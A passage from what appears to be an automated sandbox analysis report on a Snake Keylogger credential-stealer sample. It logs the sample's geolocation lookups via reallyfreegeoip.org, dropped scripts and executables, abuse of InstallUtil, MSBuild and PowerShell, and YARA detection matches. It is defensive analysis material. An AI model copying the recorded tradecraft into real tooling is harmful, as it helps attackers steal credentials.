                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Htk7kjzz5WrSAC7JZAs1YW5hro01R%2BcZTmDiQkCMAsA4RXA3sEbEAQb34bSo%2FD4zY%2F3Z1D0YAE8aAu4jMxA%2BsrX91MZ6cKH5Mieg3NK5VoY708GDegNm5SEqILyUwoJNGgJ6ljV"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb1bab3d41d3-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:53 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:53 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.649770188.114.97.34431596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:55 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:55 UTC708INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:55 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40959
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aP2MNREHUOsIGd7IEyIkqMu9EjshRuYj461A%2Fr6G%2FZEs7BLfSvZi1eFxOjRlDaXkTLu84EVz4A7pM8fpigA5XBe21BEQaz%2Fp00JaND3F%2FnfwUFLbPwFaevF7oIkNaz4QrogfcYAO"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb266bec80cd-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:55 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:55 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.649774188.114.97.34431596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:57 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:57 UTC706INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:57 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40961
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zbekfax7D1LkAQtVvpu4E877EIEayCs3RD8NGxwBy1SqcDWcFloQTvYvWFTvOuMGhNCuL41J3SD2%2FfO2kbzuVWCRgsrABg5L9BzRUicvEY5tvTDHMw51L%2BPGEJqtMqM2TUMP9c%2Bw"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb324fda43fa-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:57 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:57 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.649777188.114.97.34431596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:58 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:58 UTC706INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:58 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40962
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XM%2FK1NhqmCcIJQwRN1RT2J7BWPXDzAhJ%2FFO0XbwGGs5TOYFquuHeXk42eCk5iGCsvPL1RtlYlp0RiZUlidrX5diQcVEktEIyVWzgtPJ9kb0UjXweluUR25yQOJyj%2FIHjimp29PNk"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb3a1ece726f-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:58 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:58 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:1
                          Start time:14:03:03
                          Start date:27/08/2024
                          Path:C:\Users\user\Desktop\doc1.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\doc1.exe"
                          Imagebase:0x620000
                          File size:1'118'840 bytes
                          MD5 hash:FDDD99D918C32A807CD1761C519B086B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2303816567.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:14:03:14
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\wscript.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe"
                          Imagebase:0xcc0000
                          File size:147'456 bytes
                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:4
                          Start time:14:03:14
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Imagebase:0x590000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3461729638.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:5
                          Start time:14:03:17
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs"
                          Imagebase:0x7ff790eb0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:7
                          Start time:14:03:18
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:8
                          Start time:14:03:18
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:11
                          Start time:14:03:24
                          Start date:27/08/2024
                          Path:C:\Users\user\AppData\Roaming\bosotkm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\bosotkm.exe"
                          Imagebase:0xc60000
                          File size:1'118'840 bytes
                          MD5 hash:FDDD99D918C32A807CD1761C519B086B
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 53%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:12
                          Start time:14:03:25
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0x8d0000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Clipboard_Hijacker_1, Description: Yara detected Clipboard Hijacker, Source: 0000000C.00000002.2456553798.00000000009D2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:15
                          Start time:14:03:26
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:16
                          Start time:14:03:27
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff794bc0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:18
                          Start time:14:03:32
                          Start date:27/08/2024
                          Path:C:\Users\user\AppData\Roaming\bosotkm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\bosotkm.exe"
                          Imagebase:0xee0000
                          File size:1'118'840 bytes
                          MD5 hash:FDDD99D918C32A807CD1761C519B086B
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:19
                          Start time:14:03:34
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:20
                          Start time:14:03:34
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:21
                          Start time:14:03:36
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Imagebase:0x900000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3442856723.000000000041A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3460895487.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:22
                          Start time:14:03:37
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0xe10000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:24
                          Start time:14:03:38
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:25
                          Start time:14:03:39
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff794bc0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:26
                          Start time:14:03:44
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Imagebase:0xb60000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.3442953774.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.3460956266.000000000301B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Has exited:false

                          General

                          Target ID:27
                          Start time:14:03:49
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:28
                          Start time:14:03:49
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
